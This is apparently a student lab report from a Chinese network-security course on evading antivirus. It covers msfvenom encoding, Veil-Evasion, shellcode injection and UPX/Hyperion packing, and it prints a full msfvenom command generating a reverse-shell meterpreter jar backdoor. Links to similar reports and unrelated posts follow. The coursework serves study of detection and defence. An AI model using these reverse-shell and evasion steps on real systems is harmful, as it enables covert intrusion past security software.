1.实验内容及步骤


1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程


将做实验二时生成的后门文件用virustotal网站检测,结果如图:

1.1.1正确使用msf编码器
使用msfvenom指令进行多次编码,结果如图:

1.1.2 msfvenom生成jar之类的其他文件文件
(1)使用msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.91.133 LPORT=5305 x> sxx_backdoor_java.jar生成jar文件。
检测结果如图所示:

(2)生成.apk后门程序
检测结果如图所示:

1.1.3使用veil-evasion生成后门程序并检测
启动veil-evasion,输入指令进入配置界面设置反弹连接IP和端口号,然后输入命令生成文件并设置文件名。(文件会保存到默认的路径下)



检测结果如下·:

1.1.4 Shellcode注入
(1)先生成C语言格式的shellcode数组,如图

(2)生成一个.c文件,将生成的shellcode数组写入程序中。
(3)在kali下将这个.c文件编译成为.exe可执行文件
如图:

(4)检测结果如图:

(5)用360查杀,如图:

1.1.5使用加壳工具
加壳可分为三种:

  • 压缩壳
    减少应用体积,如ASPack,UPX
  • 加密壳
    版权保护,反跟踪。如ASProtect,Armadillo
  • 虚拟机
    通过类似编译手段,将应用指令转换为自己设计的指令集。如VMProtect, Themida

(1)压缩壳
使用指令将.exe可执行文件压缩。
结果如图:

检测结果如图:

验证反弹连接结果:

(2)加密壳

  • 将上一个生成的文件拷贝到/usr/share/windows-binaries/hyperion/目录中
  • 进入目录/usr/share/windows-binaries/hyperion/中
  • 输入命令wine hyperion.exe -v sxx_upxed.exe sxx_upxed_Hyperion.exe进行加壳。
    结果如图:

1.2 通过组合应用各种技术实现恶意代码免杀


  • 一种方法不能够达到免杀的目的,所以尝试一下多种组合能否成功。
    半手工制作shellcode,加壳。
    测试反弹连接:

查杀结果:

1.3用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本


电脑win7,杀软360安全卫士,版本号11.5.0.2002
截图:

2.报告内容


2.1.基础问题回答


(1)杀软是如何检测出恶意代码的?
根据行为进行检测
根据文件的特征值进行分析
启发式恶意软件检测
(2)免杀是做什么?
通过一些方法,使恶意文件不被杀软查出来。
(3)免杀的基本方法有哪些?
加壳、修改文件的特征码等。

2.2.开启杀软能绝对防止电脑中恶意代码吗?


不能。恶意代码层出不穷,我们需要经常更新杀软,这样我们才能用杀软防御一些没有见过的恶意代码。

2.3.实践总结与体会


本次实验我主要是卡在了veil软件的安装,我安装了好长时间。本次的实验我最大的收获是提高了自己对于恶意软件的防范意识和能力,认识到了杀软并不是万能的,所以我们在日常生活中,如果需要下载软件,最好还是要到官网下载。

2018-2019-3 网络对抗技术 20165305 Exp3 免杀原理与实践的更多相关文章

  1. 2018-2019-2 20165315 《网络对抗技术》Exp3 免杀原理与实践

    2018-2019-2 20165315 <网络对抗技术>Exp3 免杀原理与实践 一.实验内容 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion ...

  2. 2018-2019-2 网络对抗技术 20165317 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165317 Exp3 免杀原理与实践 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用 ...

  3. 2018-2019-2 网络对抗技术 20165318 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165318 Exp3 免杀原理与实践 免杀原理及基础问题回答 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil- ...

  4. 2018-2019-2 网络对抗技术 20165232 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp3 免杀原理与实践 免杀原理及基础问题回答 一.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. ...

  5. 2018-2019-2 网络对抗技术 20165237 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165237 Exp3 免杀原理与实践 一.实践目标 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳 ...

  6. 2018-2019-2 网络对抗技术 20165221 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165221 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 主要依托三种恶意软件检测机制. 基于特征码的检测:一段特征码就是一段或者多 ...

  7. 2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践 实验内容(概要) 一.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己 ...

  8. 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践 - 实验任务 1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己 ...

  9. 2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践

    2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 1.对某个文件的特征码进行分析,(特征码就是一类恶意文件中经常出现的一段代 ...

随机推荐

  1. 20189210牟健 《Linux内核原理与分析》第二周作业

    本周学习了汇编指令以及通过反汇编一个小程序来了解栈的变化 写了一个简单的C程序,如图所示: 通过gcc -s -o main.s main.c -m32指令将其编译成汇编程序 打开该汇编文件并删除不重 ...

  2. [LeetCode] Flatten a Multilevel Doubly Linked List 压平一个多层的双向链表

    You are given a doubly linked list which in addition to the next and previous pointers, it could hav ...

  3. Android 小票打印USB

    第一步USB通信: Usb设备有两种,Host与Accessory 简单来说是主模式与从模式,主模式则android设备给外设供电,反之,外设给android设备充电,对于小票打印,使用的是Host模 ...

  4. [Codeforces Round #508 (Div. 2)][Codeforces 1038E. Maximum Matching]

    前几天给舍友讲这题的时候感觉挺有意思的,就贴上来吧... 题目链接:1038E - Maximum Matching 题目大意:有\(n\)个棒子,每个条两端有颜色\(c1,c2\)以及他的价值\(v ...

  5. 图像转pdf(c#版)

    using iTextSharp.text;using iTextSharp.text.pdf;using iTextSharp.text.pdf.codec;using System;using S ...

  6. springboot后台运行

    nohup java -jar shareniu.jar >out.txt &

  7. python-装饰器实现pv-uv

    python-装饰器实现pv-uv   网站流量统计可以帮助我们分析网站的访问和广告来访等数据,里面包含很多数据的,比如访问试用的系统,浏览器,ip归属地,访问时间,搜索引擎来源,广告效果等.原来是一 ...

  8. Mybatis+Mysql逆向工程

    目录结构: pom文件: <?xml version="1.0" encoding="UTF-8"?> <project xmlns=&quo ...

  9. docker镜像导入导出

    1.使用 save命令将 镜像保存为文件docker save -o  自定义文件名.tar  已存在的镜像名 2.使用load命令将镜像文件保存到本地仓库docker load -i 自定义文件名. ...

  10. 彻底清空SharePoint回收站(仅限IE)

    1.导航到回收站页面2.F12,在控制台输入javascript:emptyItems()3.回车 4.点击确定即可 注意:这种方法可能只适用于Internet Explorer